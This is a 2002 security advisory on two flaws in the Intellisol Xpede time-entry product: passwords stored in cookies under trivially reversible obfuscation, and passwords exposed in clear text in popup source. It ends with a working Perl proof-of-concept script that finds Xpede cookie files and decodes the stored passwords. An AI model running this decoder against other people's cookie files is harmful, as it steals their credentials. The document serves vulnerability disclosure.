Xpede passwords exposed (2 vuln.)

[Gregory Duchemin <c3rb3r () hotmail com>]

Passwords exposed in Intellisol XPede
==========================


About Xpede
=========

quote from 
http://www.workforceroi.com/solutions/pa/index.shtml

"Intellisol Xpede is a browser-based time and 
expense entry and project cost management module 
designed to connect a remote workforce on a real-
time basis. 
Intellisol Project Accounting is designed for any 
professional service organization such as consulting, 
software development, law, architecture, 
engineering, PR/advertising and more with between 
10 and 500 million dollars in revenue and up to 500 
employees, 
and integrates with Microsoft Great Plains Business 
Solutions financial suites. "


Problems
=======

Tested with Xpede 4.1 / NT 4.0
Two security vulnerabilites has been discovered in 
the way Xpede handle users password.

1/    Xpede's cookies store users 
password "ciphered" in a very weak manner (a mix of 
shifts and permutations), 
recovering a clear text password from there is really 
trivial making users remotely vulnerable from cross 
site scripting based attacks, 
various MSIE bugs while users are locally vulnerable 
as well, by accessing the local filesystem (ie the 
cookie file) when, for instance, 
a user decide to use someone else's computer or is 
using a computer for wich he shares Administrator 
rights with other.

2/   Passwords are shown in a clear form into 
the "session timeout" re-authentication popup source. 
The dangerous guilty javascript snipet simulate 
a "remember password" option and tests if it was 
checked to automatically fill up the formular 
password field. 
The clear password is shown as is, in the javascript 
source code, whatever the user decided to do with 
the option.
Indeed, a user can have a false sense of safety, 
leaving his host even few seconds without having 
filled up the authentication popup 
and therefore exposing his password to everybody 
lurking at the source and, once again,  is remotely 
vulnerable to the same MSIE bugs mentionned above.


Temp workarounds
=============

1 st problem /   clear all cookies via 
MSIE "Tools/Internet Options/General/Delete 
Cookies" right after a session has ended 
to avoid local attack and patch your browser with the 
latests security fixes if it wasn't already done 
(anyway, u may fall in more serious troubles in the 
latter case :).

2 nd problem/  do not expose the authentication 
popup to unwise eyes (login or quit the application)  
and again, patch your browser for remote attacks.


Additionnaly for paranoids, i suggest to close all MSIE 
running windows before accessing Xpede application 
(and during the session).



Vendor status
=========

The vendor has been contacted on March 13. and as 
far as i know, is currently working on a patch, 
in the meantime, u may want to use the above 
workarounds. 



Versions
======

Xpede support team has reported that both Xpede 4.1 
and 7.x series were affected by these vulnerabilities.


 Author & Date
===========

Gregory Duchemin (c3rb3r () hotmail com)
20 March 2002.


Have a nice day.



Proof of concept (password recovery from cookies)
====================================

#!/usr/bin/perl
# Xdeep.pl, search for and decipher Xpede 
passwords stored in these damn cookies
# Pr00f of concept, not to be used for illegal purposes.
#
# Author: Gregory Duchemin Aka c3rb3r // March 
2002
#
#output format

format STDOUT =
+ Userid: @<<<<<<<
$userid
+ Realname: @<<<<<<<<<<<<<<<<<<<<<<<<<
$realname
+ Company: @<<<<<<<<<<<<<<<<<<<<
$company
+ Encoded password: @<<<<<<<<<<<<<<<<<<<<
$password
.


#Cookie fingerprint
$signature="defPWD";



#decoding stuff
@PERMU=('9', '11', '2', '6', '4', '10', '1', '8', '7', '3', '5');
@ALPHA=
('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O'
, 'P', 'Q', 'R','S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a','b','c','d','
e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y'
,'z');
@SHIFT=(9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23);  


#Change the following path to match your system
@COOKIE= glob
('c:\winnt\Profiles\*\Cookies\*@*.txt');



$i=$count=0;
@FOUND= ('nope');

print "\n\nXdeep.pl  Xpede cookies finder and decoder 
\n\n-- Gregory Duchemin (Aka C3rb3r) ^ Feb 2002 --
\n\n\n";

foreach $try (@COOKIE) {
$count++;
if (open(handle, $try)) 
{
@lines=<handle>;
if (!index($lines[0], $signature))
{
printf("\n+ Xpede cookie found ! yep :)  <=>  %s\n", 
$try);
$FOUND[$i]=$try;
$i++;
}
close(handle);  
}

}

printf("\n+ %d files checked.\n", $count);

if (! $i)
{
print "\n\n- No Xpede cookie found, sorry\n\n";
exit(0);
}

printf("\n\n+ %d Cookie(s) found.\n", $i);
print "\n\n\n[Press return]\n";
$try=<STDIN>;

foreach $try (@FOUND) {

if (open(handle, $try)) 
{
@lines=<handle>;

$userid= @lines[55];
$realname=@lines[64];
$password=@lines[46];
$company=@lines[28];

$realname =~ s/\+/ /;
$userid =~ s/\+/ /;
$password =~ s/\+/ /;
$company =~ s/\+/ /;

$userid =~ s/%([a-f0-9][a-f0-9])/pack("C", hex
($1))/eig; 
$realname =~ s/%([a-f0-9][a-f0-9])/pack("C", hex
($1))/eig; 
$password =~ s/%([a-f0-9][a-f0-9])/pack("C", hex
($1))/eig; 
$company =~ s/%([a-f0-9][a-f0-9])/pack("C", hex
($1))/eig; 

printf "\n+ Found Xpede cookie :\n>> %s <<\n\n", $try;
write;
print "\n\n! Cr4cking 1n progr3ss ... \n";

@list=split //, $password;




if (length($password) > 12 ) 
{
$MAX = 11;
$DIFF = length($password)-1-$MAX;
for ($i = 0; $i < ($DIFF); $i++) {$REST = $REST.$list
[$i]; }
splice(@list, 0, ($DIFF));
printf "\n+ Clear part is %s\n", $REST;
}
else {$MAX = length($password)-1;printf "\n- No clear 
part found \n";}



for ($i=0; $i<$MAX; $i) { $temp_pass = 
$temp_pass.$list[$PERMU[$i++]-1]; }
printf "\n+ Permutations give %s\n", $temp_pass;


@list=split //, $temp_pass;
for ($i=0; $i<$MAX; $i++) 
{
$b = ord($list[$i]);
$c = $SHIFT[$i];
$flag=0;


for ($z=0; $z<52; $z+=1) 
{
 if (ord($ALPHA[$z]) == $b) { $a = ord($ALPHA
[($z+$c)%52]);$flag=1;}
} 

if (!$flag) {$a = $b;}


$decode = $decode.chr($a);
printf "\n+ %s Shift(%d) \t --> \t%s", chr($b), $c, chr
($a);
}

printf "\n\n+ Shifting with secret key give %s\n", 
$decode; 
printf "\n! Password is \"%s\"\n\n", $decode.$REST;
printf "\n\n- End.\n\n";

$decode=$REST=$temp_pass="";
close(handle);

print "\n\n[Press return]\n";
$try=<STDIN>;
}
}